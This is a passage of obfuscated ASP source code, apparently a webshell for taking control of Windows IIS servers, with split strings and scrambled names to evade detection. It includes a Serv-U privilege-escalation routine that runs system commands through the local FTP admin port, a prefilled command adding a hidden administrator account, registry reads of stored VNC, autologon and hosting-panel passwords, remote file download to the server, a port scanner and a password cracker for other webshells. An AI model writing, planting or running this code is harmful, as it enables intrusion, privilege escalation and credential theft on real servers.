  2377. sodx "80%"
  2378. abxky 1
  2379. echo"<td>"
  2380. injj goaction,"","","Add domain",""
  2381. echo"</td>"
  2382. echo"<td>"
  2383. injj goaction,4,"","Exec cmd",""
  2384. echo"</td>"
  2385. echo"<td>"
  2386. injj goaction,5,"","Clean domain",""
  2387. echo"</td>"
  2388. uemp
  2389. guenn
  2390. echo"</center>"
  2391. viwe
  2392. End Sub
  2393. Sub rhlo()
  2394. If Not ydnj Then On Error Resume Next
  2395. Set a=nfffq("Microsoft.XM"+swww+"LHTTP")
  2396. a.open"GET","http://127.0.0.1:"&kurmq&"/goldsun/upa"+oklv+"dmin/s1",True,"",""
  2397. a.send gtt&ertns&mt&qrqg&zqps&ubql&znx
  2398. Set Session("a")=a
  2399. yln"Connecting 127.0.0.1:"&kurmq&" using "&vgm&",pass:"&ulz&"..."
  2400. tvnm(Err)
  2401. iks
  2402. End Sub
  2403. Sub fumw()
  2404. If Not ydnj Then On Error Resume Next
  2405. iks()
  2406. Set b=nfffq("Microsoft.XM"+swww+"LHTTP")
  2407. b.open"GET","http://"&ramoi("LOCAL_ADDR")&":"&wtpog&"/goldsun/upa"+oklv+"dmin/s2",False,"",""
  2408. b.send"User "&nuser&vbCrLf&"pass "&npass&vbCrLf&"site exec "&nyf&vbCrLf&znx
  2409. Set Session("b")=b
  2410. yln"Executing com"+nhmkc+"mand..."
  2411. mwt"<hr><center><div class='alt1Span' style='width:80%;text-align:left'><br>"
  2412. mwt Replace(b.ResponseText,chr(10),"<br>")&"</div></center>"
  2413. tvnm(Err)
  2414. End Sub
  2415. Sub rlosg()
  2416. If Not ydnj Then On Error Resume Next
  2417. Set c=nfffq("Microsoft.XM"+swww+"LHTTP")
  2418. c.open "GET","http://127.0.0.1:"&kurmq&"/goldsun/upa"+oklv+"dmin/s3",True,"",""
  2419. c.send gtt&ertns&mt&qrqg&znx
  2420. Set Session("c")=c
  2421. yln"Temp domain deleted!"
  2422. echo"<script language='javascript'>setTimeout(""qjr('"&goaction&"','','')"",""3000"");</script>"
  2423. tvnm(Err)
  2424. End Sub
  2425. Function nboac()
  2426. If Not ydnj Then On Error Resume Next
  2427. nboac=Lcase(Left(xjab.GetSpecialFolder(0),2))
  2428. If nboac=""Then nboac="c:"
  2429. End Function
  2430. Sub iks()
  2431. If nuser=""Then nuser="go"
  2432. If npass=""Then npass="od"
  2433. If wtpog=""Then wtpog="60000"
  2434. cxaqj True
  2435. rtas "qtylw",2
  2436. echo"<center><b>Execute Cmd</b><br>"
  2437. sodx "80%"
  2438. abxky 1
  2439. doTd"com"+nhmkc+"mand",""
  2440. iiit"text","nyf","cmd /c net u"+rmct+"ser admin$ fuckyou /add & net localg"+ezyq+"roup administrators admin$ /add","","",3
  2441. uemp
  2442. abxky 0
  2443. doTd"Ftp user",""
  2444. iiit"text","nuser",nuser,"","",""
  2445. doTd"Ftp pass",""
  2446. iiit"text","npass",npass,"","",""
  2447. uemp
  2448. abxky 1
  2449. doTd"Ftp port",""
  2450. iiit"text","wtpog",wtpog,"","",""
  2451. echo"<td>"
  2452. qjr"Go"
  2453. echo"</td><td>"
  2454. zesc"reset","","ReSet","",""
  2455. echo"</td></tr>"
  2456. guenn
  2457. echo"</center>"
  2458. gbqwf
  2459. End Sub
  2460. Sub xbb()
  2461. cxaqj True
  2462. rtas "qtylw",3
  2463. echo"<center><b>Clean Temp Domain</b><br>"
  2464. sodx "80%"
  2465. abxky 1
  2466. doTd"Local user","20%"
  2467. iiit"text","vgm","LocalAdmin"+dslf+"istrator","30%","",""
  2468. doTd"Local pass","20%"
  2469. iiit"text","ulz","#l@$ak#.lk;0@P","30%","",""
  2470. uemp
  2471. abxky 0
  2472. doTd"Local port",""
  2473. iiit"text","kurmq","43"+zcek+"958","","",""
  2474. doTd"Temp domain port",""
  2475. iiit"text","wtpog","60000","","",""
  2476. uemp
  2477. abxky 1
  2478. echo"<td colspan='2'>"
  2479. qjr"Go"
  2480. echo"</td><td colspan='2'>"
  2481. zesc"reset","","ReSet","",""
  2482. echo"</td></tr>"
  2483. guenn
  2484. echo"</center>"
  2485. gbqwf
  2486. End Sub
  2487. Sub aum()
  2488. If Not ydnj Then On Error Resume Next
  2489. Dim theFolder
  2490. ajg"Asp Webshell Scanner"
  2491. echo"Path : "
  2492. cxaqj True
  2493. zesc"text","lqbip","/",50,""
  2494. echo" "
  2495. qjr"Scan"
  2496. jwik"glw",1," Get include files",""
  2497. If lqbip<>""Then
  2498. If InStr(lqbip,":\")<1 And Left(lqbip,2)<>"\\" Then lqbip=wxw(lqbip)
  2499. echo"<hr>"
  2500. Response.Flush()
  2501. yhigl
  2502. Set theFolder=xjab.GetFolder(lqbip)
  2503. gcaso(theFolder)
  2504. Set theFolder=Nothing
  2505. echo"</ul>"
  2506. End If
  2507. viwe
  2508. End Sub
  2509. Sub gcaso(theFolder)
  2510. If Not ydnj Then On Error Resume Next
  2511. Server.ScriptTimeOut=5000
  2512. Dim pdlm,vquvc,ext,nvkql,funcs,mrc,duvu,theFile,content,ybt
  2513. pdlm="WS"+qkdx+"cript.She"+nomr+"ll|WS"+qkdx+"cript.She"+nlrnz+"ll.1|She"+nlrnz+"ll.Applic"+oqzje+"ation|She"+nlrnz+"ll.Applic"+oqzje+"ation.1|clsid:72"+acxz+"C24DD5-D70A-438B-8A42-98"+cxly+"424B88AFB8|clsid:13"+kqzzy+"709620-C279-11CE-A49E-4445535"+euy+"40000"
  2514. vquvc="WS"+qkdx+"cript.She"+nomr+"ll;Run,Exec,RegRead|She"+nlrnz+"ll.Applic"+oqzje+"ation;ShellExe"+fopn+"cute|Scriptin"+xfw+"g.FileSystemObj"+znlfx+"ect;CreateTextFile,OpenTextFile,SavetoFile"
  2515. For Each eyr in theFolder.Files
  2516. ybt=False
  2517. mrc=False
  2518. ext=Lcase(zsz(eyr.Name,"."))
  2519. If vsb(ext,"^("&dxpm&")$") Then
  2520. content=tpcq(eyr.Path)
  2521. duvu=""
  2522. For Each xjmb in Split(pdlm,"|")
  2523. If InStr(1,content,xjmb,1)>0 Then
  2524. qean eyr,"Object with risk : <font color=""red"">"&xjmb&"</font>"
  2525. ybt=True
  2526. End If
  2527. Next
  2528. For Each strFunc in Split(vquvc,"|")
  2529. nvkql=dzzx(strFunc,";",True)
  2530. funcs=zsz(strFunc,";")
  2531. For Each subFunc in Split(funcs,",")
  2532. If vsb(content,"\."&subFunc&"\b") Then
  2533. qean eyr,"Called object <font color=""red"">"&nvkql&"'s "&subFunc&"</font> Function"
  2534. ybt=True
  2535. End If
  2536. Next
  2537. Next
  2538. If vsb(content,"Set\s*.*\s*=\s*server\s")Then
  2539. qean eyr,"Found Set xxx=Server"
  2540. ybt=True
  2541. End If
  2542. If vsb(content,"server.(execute|Transfer)([ \t]*|\()[^""]\)")Then
  2543. qean eyr,"Found <font color=""red"">Serv"+jiksj+"er.Execute / Transfer()</font> Function"
  2544. ybt=True
  2545. End If
  2546. If vsb(content,"\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript)\.encode\b")Then
  2547. qean eyr,"<font color=""red"">Script encrypted</font>"
  2548. ybt=True
  2549. End If
  2550. If vsb(content,"<script\s*(.|\n)*?runat\s*=\s*""?server""?(.|\n)*?>")Then
  2551. qean eyr,"Found <font color=""red"">"&mszsa("<script runat=""server"">")&"</font>"
  2552. ybt=True
  2553. End If
  2554. If vsb(content,"[^\.]\bExecute\b")Then
  2555. qean eyr,"Found <font color=""red"">Execute()</font> Function"
  2556. ybt=True
  2557. End If
  2558. If vsb(content,"[^\.]\bExecuteGlobal\b")Then
  2559. qean eyr,"Found <font color=""red"">ExecuteGl"+nypem+"obal()</font> Function"
  2560. ybt=True
  2561. End If
  2562. If glw=1 Then duvu=soa(content,"<!--\s*#include\s+(file|virtual)\s*=\s*.*-->",False)(0)
  2563. If duvu<>""Then
  2564. duvu=soa(duvu,"[/\w]+\.[\w]+",False)(0)
  2565. If duvu=""Then
  2566. qean eyr,"Can't get include file"
  2567. ybt=True
  2568. Else
  2569. qean eyr,"Included file <font color=""blue"">"&duvu&"</font>"
  2570. ybt=True
  2571. End If
  2572. End If
  2573. End If
  2574. If ybt Then
  2575. echo"<hr>"
  2576. Response.Flush()
  2577. End If
  2578. Next
  2579. For Each phebk in theFolder.SubFolders
  2580. gcaso(phebk)
  2581. Next
  2582. tvnm(Err)
  2583. End Sub
  2584. Sub qean(eyr,kqll)
  2585. mwt"<li><u>"
  2586. injj "veerr","unu",clwc(eyr.Path),eyr.Path,""
  2587. mwt"</u><font color=#9900FF>"&eyr.DateLastModIfied&"</font>-<font color=#009966>"&kxyzh(eyr.size)&"</font>-"&kqll&"</li>"
  2588. Response.Flush()
  2589. End Sub
  2590. Sub nvkq()
  2591. If Not ydnj Then On Error Resume Next
  2592. If lqbip=""Then lqbip=nzax
  2593. Dim mrpwl,yoc
  2594. yoc=aiw
  2595. mrpwl=wannd
  2596. If yoc=""Then yoc=Replace("HK"+xoncv+"LM\SYSTEM\Curre"+fewse+"ntControlSet\Control\ComputerNa"+wwva+"me\ComputerNa"+wwva+"me\ComputerNa"+wwva+"me|HK"+xoncv+"LM\SOFTW"+wjw+"ARE\Microsoft\Window"+zfd+"s NT\Curren"+suctf+"tVersion\Winlog"+sdxq+"on\AutoAdmin"+itn+"Logon|HK"+xoncv+"LM\SOFTW"+wjw+"ARE\Microsoft\Window"+zfd+"s NT\Curren"+suctf+"tVersion\Winlog"+sdxq+"on\Def"+lvgli+"aultUserName|HK"+xoncv+"LM\SOFTW"+wjw+"ARE\Microsoft\Window"+zfd+"s NT\Curren"+suctf+"tVersion\Winlog"+sdxq+"on\Defaul"+zhisp+"tPassword|HK"+xoncv+"LM\SYSTEM\Curre"+fewse+"ntControlSet\Services\MySQL\ImagePath|HK"+xoncv+"LM\SYSTEM\Curre"+fewse+"ntControlSet\Services\Serv"+shn+"-U-Counters\Performance\Library|HK"+xoncv+"LM\SYSTEM\Curre"+fewse+"ntControlSet\Services\Serv"+shn+"-U\ImagePath|HK"+xoncv+"LM\SOFTW"+wjw+"ARE\Cat Soft\Serv"+shn+"-U\Domains\DomainList\DomainList|HK"+xoncv+"LM\SYSTEM\Ra"+aumws+"dmin\v2.0\Server\Parameters\Parameter|HK"+xoncv+"LM\SYSTEM\Ra"+aumws+"dmin\v2.0\Server\Parameters\Port|HK"+xoncv+"LM\SYSTEM\Ra"+aumws+"dmin\v2.0\Server\Parameters\NT"+tpb+"AuThenabled|HK"+xoncv+"LM\SYSTEM\Ra"+aumws+"dmin\v2.0\Server\Parameters\Fil"+qrby+"terIp|HK"+xoncv+"LM\SYSTEM\Ra"+aumws+"dmin\v2.0\Server\iplist\0|HK"+xoncv+"LM\SOFTW"+wjw+"ARE\ORL\WinVNC3\default\Password|HK"+xoncv+"LM\SOFTW"+wjw+"ARE\RealVNC\WinVNC4\Password|HK"+xoncv+"LM\SOFTW"+wjw+"ARE\hzhost\config\Settings\mysqlpass|HK"+xoncv+"LM\SOFTW"+wjw+"ARE\hzhost\config\Settings\mastersvrpass|HK"+xoncv+"LM\SOFTW"+wjw+"ARE\hzhost\config\Settings\sysdbpss","|",vbCrLf)
  2597. If mrpwl=""Then mrpwl=Replace("x:\|x:\Program Files|x:\Program Files\Serv"+shn+"-U|x:\Program Files\RhinoSoft.com|x:\Program Files\Ra"+aumws+"dmin|x:\Program Files\Mysql|x:\Program Files\mail|x:\Program Files\winwebmail|x:\documents and Settings\All Users|x:\documents and Settings\All Users\documents|x:\documents and Settings\All Users\Start Menu\Programs|x:\documents and Settings\All Users\Application Data\Symantec\pcAnywhere|x:\Serv"+shn+"-U|x:\Ra"+aumws+"dmin|x:\Mysql|x:\mail|x:\winwebmail|x:\soft|x:\tools|x:\windows\temp","|",vbCrLf)
  2598. ajg"Action Others"
  2599. cxaqj True
  2600. rtas"qtylw","fgcb"
  2601. mwt"<b>Download to server</b><br>"
  2602. sodx"100%"
  2603. abxky 1
  2604. iiit"text","sesq","http://","80%","",""
  2605. fkv"Download","20%"
  2606. uemp
  2607. abxky 0
  2608. iiit"text","lqbip",lqbip,"","",""
  2609. echo"<td>"
  2610. jwik"overWri",2,"Overwrite",""
  2611. uemp
  2612. guenn
  2613. gbqwf
  2614. echo"<hr>"
  2615. cxaqj True
  2616. rtas"qtylw","grl"
  2617. mwt"<b>Port scan</b><br>"
  2618. sodx"100%"
  2619. abxky 1
  2620. doTd"Scan IP","20%"
  2621. iiit"text","czwfq","127.0.0.1","60%","",""
  2622. fkv"Scan","20%"
  2623. uemp
  2624. abxky 0
  2625. doTd"Port List","20%"
  2626. iiit"text","ugxyt","21,23,80,1433,1521,3306,3389,4899,43"+zcek+"958,65500","80%","",2
  2627. uemp
  2628. guenn
  2629. gbqwf
  2630. echo"<hr>"
  2631. cxaqj True
  2632. rtas"qtylw","axt"
  2633. mwt"<b>Tiny shell crack</b><br>"
  2634. sodx"100%"
  2635. abxky 1
  2636. doTd"Url","20%"
  2637. iiit"text","sesq","http://","60%","",""
  2638. fkv"Start","20%"
  2639. uemp
  2640. abxky 0
  2641. doTd"Dic","20%"
  2642. iiit"text","pnu","value,cmd,admin,fuck,fuckyou,go,123456,#,|,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,~,!,@,*,$,1,2,3,4,5,6,7,8,9,0","","",""
  2643. echo"<td>"
  2644. rycpp"ccnh","60px",""
  2645. exhpr"asp","asp"
  2646. exhpr"php","php"
  2647. ild
  2648. echo"</td>"
  2649. uemp
  2650. guenn
  2651. gbqwf
  2652. echo"<hr>"
  2653. echo"<form method=""post"" id=""form"&ujcmu&""" action="""&cngn&""" onSubmit=""javascript:yfmde(this)"">"
  2654. ujcmu=ujcmu+1
  2655. rtas"goaction","jilq"
  2656. rtas"qtylw","unu"
  2657. mwt"<b>Stream edit</b><br>"
  2658. sodx"100%"
  2659. abxky 1
  2660. doTd"Path","20%"
  2661. iiit"text","lqbip",nzax,"60%","",""
  2662. fkv"Start","20%"
  2663. uemp
  2664. guenn
  2665. gbqwf
  2666. echo"<hr>"
  2667. cxaqj True
  2668. rtas"qtylw","ieqhv"
  2669. mwt"<b>Common path Detection</b><br>"
  2670. sodx"100%"
  2671. abxky 1
  2672. lhue"wannd",mrpwl,6
  2673. fkv"Start","20%"
  2674. uemp
  2675. guenn
  2676. gbqwf
  2677. echo"<hr>"
  2678. cxaqj True
  2679. sodx"100%"
  2680. rtas"qtylw","lcos"
  2681. mwt"<b>Registry Detection</b><br>"
  2682. sodx"100%"
  2683. abxky 1
  2684. lhue"aiw",yoc,6
  2685. fkv"Start","20%"
  2686. uemp
  2687. guenn
  2688. gbqwf
  2689. echo"<hr>"
  2690. Select Case qtylw
  2691. Case"fgcb"
  2692. echo"<hr>"
  2693. baf()
  2694. Case"lcos"
  2695. echo"<hr>"
  2696. taerr()
  2697. Case"grl"
  2698. echo"<hr>"
  2699. vny()
  2700. Case"axt"
  2701. echo"<hr>"
  2702. qddd()
  2703. Case"ieqhv"
  2704. echo"<hr>"
  2705. nzbv()
  2706. End Select
  2707. End Sub
  2708. Sub baf()
  2709. If Not ydnj Then On Error Resume Next
  2710. Dim gfst,ertms
  2711. Set nun=nfffq("Ad"+oge+"odb.Str"+chut+"eam")
  2712. gfst=zsz(sesq,"/")
  2713. If InStr(lqbip,".")<1 Then lqbip=lqbip&"\"&gfst
  2714. iuwq.Open"GET",sesq,False
  2715. iuwq.send
  2716. ome(Err)
  2717. If overWri<>2 Then
  2718. overWri=1
  2719. End If
  2720. With nun
  2721. .Type=1
  2722. .Mode=3
  2723. .Open
  2724. .Write iuwq.ResponseBody
  2725. .Position=0
  2726. execute "nun.Sa"&uyl&"vetoFile lqbip,overWri"
  2727. .Close
  2728. End With
  2729. If Err Then
  2730. tvnm(Err)
  2731. Else
  2732. echo"Download succeeded"
  2733. End If
  2734. End Sub
  2735. Sub taerr()
  2736. If Not ydnj Then On Error Resume Next
  2737. Dim tftr
  2738. echo"Registry key detected will be shown below:<br>"
  2739. sodx "100%"
  2740. ads=1
  2741. vhl
  2742. doTd"<b>Key</b>",""
  2743. doTd"<b>Value</b>",""
  2744. uemp
  2745. For Each muh in Split(aiw,Chr(10))
  2746. muh=Replace(muh,Chr(13),"")
  2747. tftr=knf(muh)
  2748. If tftr<>"" Then
  2749. abxky ads
  2750. doTd muh,""
  2751. doTd tftr,""
  2752. uemp
  2753. nrf
  2754. End If
  2755. Next
  2756. guenn
  2757. If Err Then
  2758. tvnm(Err)
  2759. End If
  2760. End Sub
  2761. Function knf(rpath)
  2762. Dim daxgr,tftr
  2763. If Not ydnj Then On Error Resume Next
  2764. execute "daxgr=vnznl.RegR"&ddrpj&"ead(rpath)"
  2765. If IsArray(daxgr)Then
  2766. tftr=""
  2767. For i=0 To UBound(daxgr)
  2768. If IsNumeric(daxgr(i))Then
  2769. If CInt(daxgr(i))<16 Then
  2770. tftr=tftr&"0"
  2771. End If
  2772. tftr=tftr&CStr(Hex(CInt(daxgr(i))))
  2773. Else
  2774. tftr=tftr&daxgr(i)
  2775. End If
  2776. Next
  2777. knf=tftr
  2778. Else
  2779. knf=daxgr
  2780. End If
  2781. End Function
  2782. Sub vny()
  2783. If Not ydnj Then On Error Resume Next
  2784. If Not pwzt(czwfq)Then
  2785. yln "Invalid IP format"
  2786. viwe
  2787. End If
  2788. If Not vsb(ugxyt,"^(\d{1,5},)*\d{1,5}$")Then
  2789. echo "Invalid port format"
  2790. viwe
  2791. End If
  2792. echo "Scanning...<br>"
  2793. Response.Flush()
  2794. For Each tmpip in Split(czwfq,",")
  2795. For Each tmpPort in Split(ugxyt,",")
  2796. toqvj tmpip,tmpPort
  2797. Next
  2798. Next
  2799. End Sub
  2800. Sub toqvj(patae,pfj)
  2801. On Error Resume Next
  2802. Dim conn,ihk
  2803. Set conn=nfffq("Ad"+oge+"odb.Connecti"+wehbe+"on")
  2804. ihk="Provider=SQLOLEDB.1;Data Source="&patae&","&pfj&";User ID=lake2;Password=lake2;"
  2805. conn.ConnectionTimeout=1
  2806. conn.open ihk
  2807. If Err Then
  2808. If Err.number=-2147217843 or Err.number=-2147467259 Then
  2809. If InStr(Err.description,"(Connect()).")>0 Then
  2810. echo"<label>"&patae&":"&pfj&"</label><label>close</label><br>"
  2811. Else
  2812. echo"<label>"&patae&":"&pfj&"</label><label><font color=red>open</font></label><br>"
  2813. End If
  2814. Response.Flush()
  2815. End If
  2816. End If
  2817. End Sub
  2818. Sub qddd()
  2819. If Not ydnj Then On Error Resume Next
  2820. echo"Cracking...<br>"
  2821. Response.Flush()
  2822. For Each strPass in Split(pnu,",")
  2823. If ccnh="asp"Then
  2824. strpam=nwtcn(strPass)&"="&nwtcn("response.write 98611")
  2825. Else
  2826. strpam=nwtcn(strPass)&"="&nwtcn("echo 98611;")
  2827. End If
  2828. If InStr(rvi(sesq&"?"&strpam,"POST"),"98611")>0 Then
  2829. echo"Password is <font color=red>"&strPass&"</font> ^_^"
  2830. viwe
  2831. End If
  2832. Next
  2833. echo"Crack failed,RPWT?"
  2834. tvnm(Err)
  2835. End Sub
  2836. Sub nzbv()
  2837. If Not ydnj Then On Error Resume Next
  2838. Dim vhyzu,xad
  2839. echo"Path detected will be shown below:<br>"
  2840. wannd=Replace(wannd,"x:\","")
  2841. xad=1
  2842. For Each drive in xjab.Drives
  2843. For Each muh in Split(wannd,vbCrLf)
  2844. execute "vhyzu=drive.DriveL"&uocpb&"etter&"":\""&muh"
  2845. If xjab.FolderExists(vhyzu)Then
  2846. gfk xad
  2847. injj "veerr","",clwc(vhyzu),vhyzu,""
  2848. echo"</span>"
  2849. xad=xad+1
  2850. If xad=2 Then xad=0
  2851. vldnv.MoveNext
  2852. Response.Flush()
  2853. End If
  2854. Next
  2855. Next
  2856. tvnm(Err)
  2857. End Sub
  2858. Sub mddep()
  2859. Response.Cookies(fjjxv)=""
  2860. Response.Cookies(wseta&"ihk")=""
  2861. Response.Cookies(fjjxv).expires=Now
  2862. Response.Cookies(wseta&"ihk").expires=Now
  2863. Response.Redirect(cngn&"?goaction="&amb)
  2864. End Sub
  2865. Sub ajg(porw)
  2866. %>
  2867. <html>
  2868. <head>
  2869. <title><%=mvvi%></title>
  2870. <style type="text/css">
  2871. body,td{font: 12px Arial,Tahoma;line-height: 16px;}
  2872. .main{width:100%;padding:20px 20px 20px 20px;}
  2873. .hidehref{font:12px Arial,Tahoma;color:#646464;}
  2874. .showhref{font:12px Arial,Tahoma;color:#0099FF;}
  2875. .input{font:12px Arial,Tahoma;background:#fff;height:20px;BORDER-WIDTH:1px;}
  2876. .text{font:12px Arial,Tahoma;background:#fff;padding:1px;BORDER-WIDTH:1px;}
  2877. .tdInput{font:12px Arial,Tahoma;background:#fff;padding:1px;height:20px;width:100%;BORDER-WIDTH:1px;}
  2878. .tdText{font:12px Arial,Tahoma;background:#fff;padding:1px;width:100%;BORDER-WIDTH:1px;}
  2879. .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
  2880. .frame{font:12px Arial,Tahoma;border:1px solid #ddd;width:100%;height:400px;padding:1px;}
  2881. a{color: #00f;text-decoration:underline;}
  2882. a:hover{color: #f00;text-decoration:none;}
  2883. .alt1Span{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e6e8ea;padding:6px 10px 0px 5px;min-height:25px;width:100%;display:block}
  2884. .alt0Span{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fbfcfd;padding:6px 10px 0px 5px;min-height:25px;width:100%;display:block}
  2885. .link td{border-top:1px solid #fff;border-bottom:1px solid #ccc;background:#e0e2e6;padding:5px 10px 5px 5px;}
  2886. .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e6e8ea;padding:2px 10px 2px 5px;height:28px}
  2887. .alt0 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fbfcfd;padding:2px 10px 2px 5px;height:28px}
  2888. .focusTr td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#d9dbdf;padding:2px 10px 2px 5px;height:28px}
  2889. .head td{border-top:1px solid #ccc;border-bottom:1px solid #bbb;background:#d9dbdf;padding:5px 10px 5px 5px;font-weight:bold;}
  2890. form{margin:0;padding:0;}
  2891. .bt{border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:23px;padding:0 6px;}
  2892. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
  2893. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
  2894. u{text-decoration: none;color:#777;float:left;display:block;width:50%;margin-right:10px;}
  2895. label{font:12px Arial,Tahoma;float:left;width:20%;}
  2896. .lbl{font:12px Arial,Tahoma;float:none;width:auto;}
  2897. </style>
  2898. <script>
  2899. var sjk='';function bik(obj){var sender=event.srcElement;if(obj.style.display=='none'){obj.style.display='';sender.className='showhref';}else{obj.style.display='none';sender.className='hidehref';}}function tort(){form2.qtylw.value="msbca";form2.submit();}function qjr(lfy,crlb,Str){var renStr;actForm.goaction.value=lfy;actForm.qtylw.value=crlb;if((lfy=="veerr"||lfy=="jilq"||lfy=="jzp")&&Str&&Str.indexOf(":\\")<0&&Str.substr(0,2)!="\\\\"){objpath=document.getElementById('brwr');if(objpath){Str=objpath.value+Str;}}actForm.gwk.value=miig(Str);switch(crlb){case"omtw":yfmde(document.getElementById('upform'));upform.submit();break;case"fomgk":yfmde(document.getElementById('saform'));saform.submit();break;case"ttg":case"vseta":case"wma":case"plz":case"strwh":case"swxiy":case"ezemc":switch(crlb){case"wma":case"vseta":renStr=prompt("Move to :",dzzx(Str,"\\",false));break;case"plz":case"ttg":renStr=prompt("Copy to :",dzzx(Str,"\\",false));break;case"strwh":case"swxiy":renStr=prompt("Rename as :",zsz(Str,"\\"));if(crlb=="strwh"){while(renStr.indexOf(".")<0&&renStr){renStr=prompt("Invalid file name format!",zsz(Str,"\\"));}}break;}if(!renStr){return;}actForm.gwk.value=miig(Str+"|"+renStr);actForm.submit();break;case"dprl":case"eyq":if(confirm("Delete "+Str+"?Are you sure?")){actForm.submit();}break;default:actForm.submit();break;}}function miig(pamToEn){if(!<%=Lcase(CStr(pipu))%>||!pamToEn){return(pamToEn);}var tt="";for(var i=0;i<pamToEn.length;i++){tt+=(pamToEn.charCodeAt(i)+<%=iycew%>)+"<%=csj%>";}return(tt.substr(0,tt.length-1));}function yfmde(xgqlo){var pamArr="<%=jsrfr%>".split("|");for(var i=0;i<pamArr.length;i++){if(xgqlo.elements[pamArr[i]]){xgqlo.elements[pamArr[i]].value=miig(xgqlo.elements[pamArr[i]].value);}}}function vtbqk(){if(ghpc.checked){ogda.value=miig(ogda.value);}else{ogda.value=mdez(ogda.value);}}function thra(){inl.document.body.innerHTML="<form name=frm method=post action='?'><input type=hidden name=goaction value='<%=goaction%>' /><input type=hidden name='qtylw' value='viewResult'/><input type=hidden name='uwrty' value='"+miig(form1.ihyn.value.substr(form1.ihyn.value.indexOf(">")+1).replace(/(^[\s]*)|([\s]*$)/g,""))+"'/></form>";inl.document.frm.submit();}function abckx(crlb,ihk,ybgqm,rxg,fkho){sqlForm.qtylw.value=crlb;if(crlb=="usa"){if(!confirm("Delete this table?Are you sure?")){return;}}if(ihk){if(ihk.toLowerCase().indexOf("=")<0){ihk="<%=xop("")%>"+brwr.value+ihk;}sqlForm.ihk.value=ihk;}sqlForm.ihk.value=miig(sqlForm.ihk.value);sqlForm.ybgqm.value=miig(ybgqm);sqlForm.rxg.value=miig(rxg);sqlForm.fkho.value=fkho;sqlForm.submit();}function tywoa(server,user,pass,db,sspi){if(sspi){form1.ihk.value="PROVIDER=SQLOLEDB;DATA SOURCE="+server+";DATABASE="+db+";Integrated Security=SSPI";}else{form1.ihk.value="PROVIDER=SQLOLEDB;DATA SOURCE="+server+";UID="+user+";PWD="+pass+";DATABASE="+db;}}function kew(dbpath){form1.ihk.value="<%=xop("")%>"+dbpath;}function cmxd(){var pamArr="<%=jsrfr%>".split("|");var reg=/^([\d]+\<%=csj%>)+[\d]+$/;for(var i=0;i<document.forms.length;i++){var xgqlo=document.forms[i];for(var j=0;j<pamArr.length;j++){if(xgqlo.elements[pamArr[j]]){xgqlo.elements[pamArr[j]].value=mdez(xgqlo.elements[pamArr[j]].value);}}}}function mdez(otrjv){if(!<%=Lcase(CStr(pipu))%>||!otrjv||!otrjv.match(/^(\d+\<%=csj%>)+\d+$/)){return(otrjv);}var dd="";var tcpo=otrjv.split("<%=csj%>");for(var i=0;i<tcpo.length;i++){if(tcpo[i].match(/^\d+$/)){dd+=String.fromCharCode(tcpo[i]-<%=iycew%>);}else{dd+=tcpo(i);}}return(dd);}function vszds(arr,str){for (i=0;i<arr.length;i++){if(arr(i)==str){return true;}}return false;}function dzzx(str,isbbo,liujq){if(!str||str.indexOf(isbbo)<0){return(str);}if(liujq){return(str.substr(0,str.indexOf(isbbo)));}else{return(str.substr(0,str.lastIndexOf(isbbo)));}}function zsz(str,isbbo){if(!str||str.indexOf(isbbo)<0){return(str);}return(str.substr(str.lastIndexOf(isbbo)+1));}
  2900. </script>
  2901. </head>
  2902. <body style="margin:0;table-layout:fixed; word-break:break-all;"bgcolor="#fbfcfd">
  2903. <table width="100%"border="0"cellpadding="0"cellspacing="0">
  2904. <tr class="head">
  2905. <td style="width:30%"><br><%=ramoi("LOCAL_ADDR")&"("&lkyy&")"%></td>
  2906. <td align="center" style="width:40%"><br>
  2907. <b><%opa mvvi,"#0099FF","3"%></b><br>
  2908. </td>
  2909. <td style="width:30%"align="right"><%=xqai()%></td>
  2910. </tr>
  2911. <form id="actForm"method="post"action="<%=cngn%>">
  2912. <input type="hidden" id="goaction" name="goaction" value="">
  2913. <input type="hidden" id="qtylw" name="qtylw" value="">
  2914. <input type="hidden" id="gwk" name="gwk" value="">
  2915. </form>
  2916. <form id="sqlForm"method="post"action="<%=cngn%>">
  2917. <input type="hidden" id="goaction" name="goaction" value="kbqxz">
  2918. <input type="hidden" id="qtylw" name="qtylw" value="">
  2919. <input type="hidden" id="ihk" name="ihk" value="<%=ihk%>">
  2920. <input type="hidden" id="ybgqm" name="ybgqm" value="">
  2921. <input type="hidden" id="rxg" name="rxg" value="">
  2922. <input type="hidden" id="fkho" name="fkho" value="">
  2923. </form>
  2924. <%
  2925. If uwdvh Then
  2926. %>
  2927. <tr class="link">
  2928. <td colspan="3">
  2929. <a href="javascript:qjr('lfx','','');">Server Info</a> |
  2930. <a href="javascript:qjr('bapis','','');">Object Info</a> |
  2931. <a href="javascript:qjr('eyb','','');">User Info</a> |
  2932. <a href="javascript:qjr('fbk','','');">C-S Info</a> |
  2933. <a href="javascript:qjr('zzajv','','');">WS Execute</a> |
  2934. <a href="javascript:qjr('rwumm','','');">App Execute</a> |
  2935. <a href="javascript:qjr('veerr','','');">FSO File</a> |
  2936. <a href="javascript:qjr('jilq','','');">App File</a> |
  2937. <a href="javascript:qjr('kbqxz','','');">DataBase</a> |
  2938. <a href="javascript:qjr('jzp','','');">File Packager</a> |
  2939. <a href="javascript:qjr('dkdl','','');">File Searcher</a> |
  2940. <a href="javascript:qjr('ide','','');">ServU Exp</a> |
  2941. <a href="javascript:qjr('rcjqh','','');">Scan Shells</a> |
  2942. <a href="javascript:qjr('gbe','','');">Some Others...</a> |
  2943. <a href="javascript:qjr('Logout','','');">Logout</a> |
  2944. <a href="javascript:cmxd();">Decode</a>
  2945. </td>
  2946. </tr>
  2947. <%
  2948. End If
  2949. %></table>
  2950. <table width="100%"><tr><td class="main"><br>
  2951. <%
  2952. echo"<b>"
  2953. opa porw&"&raquo;","#0099ff","2"
  2954. mwt"</b><br><br>"
  2955. End Sub
  2956. Sub grh()
  2957. Dim sqx
